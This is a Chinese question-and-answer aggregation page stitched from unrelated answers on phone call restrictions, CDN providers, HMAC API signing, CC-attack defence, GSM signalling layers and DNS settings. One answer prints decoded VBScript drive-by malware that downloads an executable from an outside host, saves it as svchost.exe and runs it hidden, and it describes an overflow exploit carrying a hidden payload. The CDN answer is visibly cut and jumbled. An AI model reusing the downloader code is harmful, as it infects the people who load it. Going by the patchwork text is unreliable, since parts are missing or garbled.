Ccurl鉴权加密

A. 为什么我的手机打电话出去提示的是“您没有开通此项业务......”

一、解决方法如下

手机设置呼叫限制或调试某个功能，如果没有的话将卡放其他手机中试试，看能不能正常使用，这样可判断是否是手机或卡的问题。

解决方法：

第一,查手机设置原因,一般在手机的"通话设置"或"手机设置"菜单上设置了限制呼出或线路选择2引起的,只要进入相应的菜单取消限制呼出或将线路2改为线路1即可.

第二,可能是手机软件故障,可先关机开机后试拨打电话看看.

第三,如与手机无关,请拨打客服反映网络问题.

（参考资料：网络：手机号码）

B. 腾讯云cdn和阿里云cdn哪个好

如今，对于我们用户而言可以选择的国内、国外主机服务商、云主机产品越来越多，成本也越来越低。国内主流的BAT也都有提供相应的云主机产品服务（网络云BCC、腾讯云CVM、阿里云ECS）。在云服务器服务之外，还会提供与之相关联的其他云服务，比如存储、数据库、安全、监控工具等等。

如今各大中型网站都会启用内容分发网络CDN加速服务，通过CDN服务商网络节点，更友好、更快速地展现网站项目和服务，进而提高网站友好度。

在这篇文章，将会针对当前网络云（cloud..com）、腾讯云（qcloud.com）、阿里云（aliyun.com）三家国内云主机提供商，对比各自CDN服务的优势、特点。进而可以方便我们用户选择需要的服务。

第一、是否免费

对于用户而言，我们更希望商家能够提供免费服务，我们也能够从网上看到一些商家提供的免费CDN服务，大部分商家免费与付费还是有一定的区别的，比如节点、速度、以及其他增值功能区别。当然，对于一般网站来说，开始使用免费服务也是可取的，但是随着项目的升级、收入的增加，我们最终还是需要使用付费服务来保障服务的质量。

1、网络云CDN

以上对阿里云CDN和腾讯云CDN部署实例后，利用17CE在线工具进行的简单国内电信、移动、联通、以及海外节点的测速数据。以上数据仅仅是当前工具节点的速度体现，实际上会因为具体项目、DNS解析，实际用户真实节点等因素会有所差异。

第五、BAT三家CDN服务小结

由于各自业务重心不同，起步稍有早晚区别，但是可以看到这两年各家在云主机业务上也在陆续增设部署。

1、从官方界面看，腾讯云官网界面给个人的感觉比较好看，以前觉得阿里还不错的，但是由于产品增多，无论是前台和后台的产品菜单布局显得有点乱，有些时候找个菜单不知道在哪里。

2、从免费流量看，腾讯云CDN无疑是新用户最佳选择商家，新用户前6个月每月提供50GB流量，而且自开通之日起每月可以额外赠送10GB。也就是说，如果以后项目流量不超过10GB/月，那就可以一直免费使用。

C. 网页源文件被加密，怎么解密~~~

第一个加密就是利用VBScript...
解密出来的内容就是这个...
on error resume next
dim Dataspace,XMLHTTP,Stream,FileSystemObject,FolderObject,ApplicationObject
dim Path,BBS
Set Dataspace = document.createElement("object")
Dataspace.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set XMLHTTP = Dataspace.CreateObject("Microsoft.XMLHTTP","")
set Stream = Dataspace.createobject("Adodb.Stream","")
set FileSystemObject = Dataspace.createobject("Scripting.FileSystemObject","")
set FolderObject = FileSystemObject.GetSpecialFolder(2)
set ApplicationObject = Dataspace.createobject("Shell.Application","")
Path= FileSystemObject.BuildPath(FolderObject,"svchost.exe")
Stream.type = 1
XMLHTTP.Open "GET","http://bbb.ehai01.com/0.exe", False
XMLHTTP.Send
Stream.open
Stream.write XMLHTTP.responseBody
Stream.savetofile Path,2
Stream.close

ApplicationObject.ShellExecute Path,BBS,BBS,"open",0

第二个网页
先得到当前real的版本，然后把版本信息和shell信息放在PayLoad中
再把PayLoad加载到c:\\Program Files\\NetMeeting\\TestSnd.wav后面，然后利用溢出去执行Shell里面的内容,那个里面的内容..应该是用Base64加的密，但是因为Shell里面存储的是程序，所以直接解密出来是乱码....实际上那段乱码就是一个exe文件...代码是看不到的...直接看的话就像是用记事本打开一个exe文件一样的效果...

D. 内部微服务系统之间调用是否需要安全认证吗

想要为开发工程师们开发一个既能满足REST约束条件和原则又不像OAuth OAuth 那样复杂 the complexity ，仅仅使用简单的传值语句或者其它简单但同样安全的方法就能实现的web API? 聪明人会有聪明的想法… 问题 直接通过HTTP literally passing the credentials over HTTP以文本方式传输鉴权信息可能会被破译; 尤其在 Gawker incident, 再以文本或是弱加密的方式传输鉴权信息是非常不安全的做法 weakly-hashed anything is usually a bad idea. 即便是使用哈希加密后还是很有可能被人根据彩虹表 Rainbow Table破译出与用户名匹配的密码（个别案例） 这可该怎么办，真是郁闷… 也许你又会想到很多公共的API popular public APIs在请求中采用双数据的模式：一个公有值一个（最好是有）只有属主能访问的私有值。 ”还是有点不对!”这不跟原来（用户名密码模式）文本模式差不多么，还是可能会被（嗅探器）破译。 这时候你可能准备放弃并采用OAuth模式了，但仍坚信必有某种简单方法能实现公用webAPI安全访问私有鉴权信息。 解决方案 连续2天的Peyote实验后（你可能会找到更好的放松办法），结论终于呈现在你眼前：Amazon是拥有最大的、使用最多的在线网络API的网络服务之一，并且根本不支持OAuth！ 经过一个下午长时间的狂想之后，你最终败下阵来，并看到Amazon是如何保持API请求安全的。你不清楚为什么，但读完整页关于如何为Amazon网络服务装配一个请求后，你依然觉得不完全合理。这个“签名”和什么连在一起？代码示例中的“data”参数是什么？这样，你会继续查找关于“安全API设计”的文章。。。 当遇到其他人问同样的问题时，你看到一些指出"HMAC"或其他事物的优秀回复，但还是不太确定。 你找到其他鼓励你使用“HMAC”的文章并且你正H-FINE地使用它，如果有人将“HMAC”解释成简明的H_ENGLISH的话。 你的确偶遇了一个有道理的蒸馏的基本概念，它是这样一简明的英语描述的： 一个服务器和客户端知道一个公钥和一个私钥；只有服务器和客户端知道私钥，但每个人都知道公钥。。。但不关心别人所知道的。 一个客户端生成一个唯一的HMAC（哈希）表示它到服务器的请求。通过把请求数据（参数和值或XML/JSON或任何它计划发送的数据）以及请求数据的散列blob和私钥结合来实现。 客户端随后将这个HASH以及所有它将要发送的参数和值一并发给服务器。 服务器接到请求，并使用与客户端相同的方式重新生成自己独有的基于提交值的HMAC（哈希）。 然后，服务器比较这两个HMAC，如果相同，服务器就信任这个客户端并执行请求。 这似乎很直截了当。最初让你困惑的是，你以为原始请求是经过加密传送的，但实际上，HMAC方法所做的一切只是使用只有客户端和服务器才知道的私钥将参数生成为一些独特的校验和（哈希）。 随后，客户端将这个校验和及原始参数和值发给服务器，然后服务器复核校验和（哈希）以确定它接受客户端所发的请求。 因为根据假设，只有在客户端和服务器知道私钥，我们假设如果他们的哈希匹配，那么它们会互相信任，以至服务器随即正常处理这个请求。 你知道在现实中，这就相当于某人过来对你说：“Jimmy让我告诉你把钱给Johnny”，但你不知道这个人是谁，所以你要伸出手去试探他，看看他是否知道这个秘密握手。 如果三次握手证明无误，则通讯继续进行，否则中断通讯。. 你明白了大概是怎么回事，但还是想会不会还有更好的方法呢？还好，有tarsnap网站 tarsnap帮你答疑解惑。看看亚马逊是如何解决签名认证问题的Amazon screwed this up with Signature Version 1. 看完了亚马逊的web service是如何鉴权的，re-read how Amazon Web Services does authentication 讲的确实有道理，整个流程如下: [客户端]在调用REST API之前，首先将待发送消息体打包, combine a bunch of unique data together(websevice端将要接收的数据) [客户端]用系统分派的密钥使用哈希(最好是HMAC-SHA1 or SHA256 ) 加密(第一步的数据). [客户端]向服务器发送数据: 用户身份认证信息例如,用户ID，客户ID或是其他能别用户身份的信息。这是公共API，大家都能访问的到(自然也包括了那些居心叵测的访问者)系统仅仅需要这部分信息来区分发信人而不考虑可靠与否(当然可以通过HMAC来判断可靠性). 发送生成的HMAC码. 发送消息体（属性名和属性值），如果是私有信息需要加密，像是（“mode=start&number=4&order=desc”或其他不重要的信息）直接发送即可. (可选项)避免重放攻击 “replay attacks” o的唯一办法就是加上时间戳。在使用HMAC算法时加入时间戳，这样系统就能依据一定的条件去验证是否有重放的请求并拒绝. [服务器端]接收客户端发来的消息. [服务器端] (参看可选项)检查接收时间和发送时间的间隔是否在允许范围内（5-15分）以避免重放攻击replay attacks. 提示: 确保待检对象的时区无误daylight savings time 更新: 最近得到的结论就是直接使用UTC时区而无需考虑DST的问题 use UTC time . [服务器端]使用发送请求中用户信息（比如.API值）从数据库检索出对应的私匙. [服务器端] 跟客户端相同，先将消息体打包然后用刚得到的私匙加密（生成HMAC）消息体. (参看可选项) 如果你使用了加入时间戳的方式避免重放攻击，请确保服务端生成的加密信息中拥有和客户端相同的时间戳信息以避免中间人攻击man-in-the-middle attack. [服务器端] 就像在客户端一样，使用HMAC哈希加密刚才的信息体. [服务器端] 将服务器端刚生成的哈希与客户端的对比。如果一致，则通讯继续；否则，拒绝请求! 提示: 在打包消息体的时候一定要考虑清楚，如果像亚马逊进行签名版本1中信息识别那样会面临哈希冲突的问题 open yourself up to hash-collisions! (建议：将整个包含URL的请求加密即可!) 特别提示:私匙绝对不能在通讯过程中传递，它仅仅用来生成HMAC,服务器端会自动查询出它的私匙并重新生成自己的HMAC.我来翻译公匙仅仅用来区分不同的用户，即使被破解也无所谓。因为此时的消息无需判断其可靠性，服务端和客户端还是要通过私匙来加密（比如，前缀、后缀，倍数等等） 10/13/11更新：Chris最近发现 pointed out 如果在HMAC计算中加入了URI或是HTTP请求/回复，攻击者更易通过更改末端或是HTTP方法来搞破坏。比如，在HTTP POST方法中将/issue/create改成/user/delete。

E. 如何防御网站cc攻击

您好，很高兴为您解答。
一般避免CC攻击的办法有几种，一个是经过防火墙；
从原理上看，基本上所有的防火墙都会检查并发的TCP/IP衔接数目，超过必定数目必定频率就会被认为是Connection-Flood。但假如IP的数量足够大，使得单个IP的衔接数较少，那么防火墙未必能阻挠CC攻击。
由于CC攻击毕竟是经过程序来抓取页面，与一般阅读者的特性差异仍是很大的，例如一般阅读者拜访一个页面，必定会接连抓取页面的HTML文件、CSS文件、JS文件和图片等一系列有关文件，而CC攻击者只是只会抓取一个URL地址的文件，不会抓取别的类型的文件，其User Agent也大部分和一般阅读者不一样，这就能够在服务器上很简略分辨出哪些拜访者是CC攻击了，已然能够判别出攻击者的IP，那么避免措施就很简略，只需要批量将这些IP屏蔽，即可到达防备CC攻击的意图。

F. RR层MM层和CC层都是什么意思

CC层的主要功能为建立、维持和释放呼叫；MM层的功能主要为位置管理—通信RR层的主要功能为在无线接口上管理传输路径及切换。呼叫流程分为：通话建立、呼叫释放、位置更新、呼叫重建和DTMF协议控制。分别从RR、MM、CC三层中以通话建立（手机作主叫）为例：首先是RR层连接的建立：手机通过RACH（随即接入信道）上行发送channel request信令，发送建立的原因（起呼、紧急呼叫、呼叫重建和寻呼响应等）和随机参考值（RAND）；BSC通过AGCH（接入运行信道）发送immediate assignment(立即指派)，在Um接口建立MS与系统间的无线连接，分配SDCCH。至此，RR连接建立。MM层连接的建立：MS上行通过CCCH发送CM service request，请求业务（如电路交换连接、短线业务等）；移动交换中心通过SDCCH下行发送auth request(鉴权请求)；MS通过SDCCH上行发送auth response(鉴权响应)；交换中心通过SDCCH下行发送 ciphering request (加密命令)；MS在SDCCH上行发送 ciphering complete （加密完成）。至此，MM层建立完成。CC层连接的建立（CC层开始使用的都是SDCCH信道）：手机上行发送set up (呼叫请求)，请求内容为呼叫请求的业务种类以及MS发送方式、编码保准等；交换中心下行发送call confirmed （呼叫确认）并下行发送alerting (振铃)，MSC发送提醒消息给BSS，如果MS收到提醒消息，就应当接通话音通路，此时主叫用户可以听到振铃声，表示被叫用户正在振铃；MSC通过BSS发送connect（连接）消息给MS,表示连接证实消息，停止所有本地产生的振铃指示，进入“激活”状态；BTS进一步把收到的消息assigment command发送给MS，分配TCH, 然后MSàBTSàBSCàMSC (FACCH)把assigment complete由移动台发送给网络以指示移动台已成功建立主信令链路,BSS证实MSC获取信道,通知MS此时释放SDCCH，使用TCH 信道，并下行发送connect acknowledge连接确认，表示网络接收连接。至此，CC层建立，通话开始建立。

G. 怎么判断网站被cc攻击了被攻击怎么解决

如何判断网站是否处于被CC攻击的状态下呢？这里提一下三种常见的方法

1、如果网站是动态网站，比如asp/asp.net/php等，在被CC攻击的情况下，IIS站点会出错提示SERVERISTOOBUSY，如果不是使用IIS来提供网站服务，会发现提供网站服务的程序无缘无故自动崩溃，出错。如果网站程序没有问题，基本上可以断定是网站被CC攻击了。

2、如果网站是静态站点，比如html页面，在被CC攻击的情况下，打开任务管理器，看网络流量，会发现网络应用里数据的发送出现严重偏高的现象，在大量的CC攻击下，甚至会达到99%的网络占用，当然，在被CC攻击的情况下网站是没办法正常访问的，但是通过3389连接服务器还是可以正常连接。

3、如果是被小量CC攻击，则站点还是可以间歇性访问得到，但是一些比较大的文件，比如图片会出现显示不出来的现象。如果是动态网站被小量CC攻击，还会发现服务器的CPU占用率出现飙升的现象。这是最基本的CC攻击症状。

网站被攻击是一件十分让人恼火的事情，不仅仅是让网站速度变慢、访问异常，往往还会导致网站关键词排名下降甚至被降权，极大干扰了网站的正常稳定运行。

防御CC攻击可以通过多种方法，禁止网站代理访问，尽量将网站做成静态页面，限制连接数量，修改最大超时时间等，也可以通过给服务器装防火墙软件，如安全狗、云锁等，也或者购买WAF云防火墙、高防IP、高防CDN。相关链接

H. cc域名解析怎么设置

域名解析也叫域名指向、服务器设置、域名配置以及反向IP登记等等，就是把由主机名，如www，字母，数字及连字符等构成的网址解析成32位的IP地址， 如202.100.222.10, 或把网址指向网址等。 解析到IP，如将www.abc.com 指向202.108.32.88； 解析到网址，如将www.abc.com指向202.108.32.88；

I. 网站被人cc攻击了怎么处理

CC攻击是目前国际上攻击成本最低的一种方式，往往黑客只需要一个简单的CC攻击软件就可以对一个小型网站造成严重的损失，轻的打开慢，卡，严重的会使网站服务器直接卡死。因为CC攻击成本低，所以CC攻击是目前国内最常见的攻击方式。

简单的CC攻击往往是通过多个代理IP对网站进行大量请求，从而导致服务器资源占满，引起网站卡死，这类攻击防御起来非常简单，一般的防火墙如安全狗都是可以防护的，只需要对IP访问频率进行限制即可。

但如果黑客的代理IP较多，那就很难防了，因为对方一个IP可以设置成一分钟访问一次或者几十秒请求一次，这个频率基本上和正常用户一样了，防火墙是无法进行拦截了。

有些防火墙可以通过User-Agent过滤，即过滤某些浏览器、蜘蛛请求，但这很容易误伤，而且很多攻击都是使用正常浏览器请求的，所以并不能有效解决CC攻击问题。

那么如何有效解决CC攻击呢？

主机吧这里推荐使用网络云加速高防CDN进行防护，网络云加速不仅可以有效防护DDoS攻击，同时对CC攻击防护也是非常有效果。网络云加速提供四到七层的DDoS攻击防护，包括CC、SYN
flood、UDP flood等所有DDoS攻击方式，
通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截，组合过滤精确识别，有效防御各种类型攻击。

接入网络云加速后即可使用以下功能进行防护拦截。

WAF篇

WAF（Web Application
Firewall）网站应用防火墙，简单点讲，就是保护您网站避免被入侵的一套防火墙系统。云加速的防火墙规则由国内顶尖的云加速安全团队制定，能防御市面上超过99%常见的SQL注入、XSS、Web服务器漏洞、应用程序漏洞以及文件访问控制等等系列的渗透攻击，有效的避免您的网站遭到入侵。

下面为WAF选择展开后的功能界面：

转自：网页链接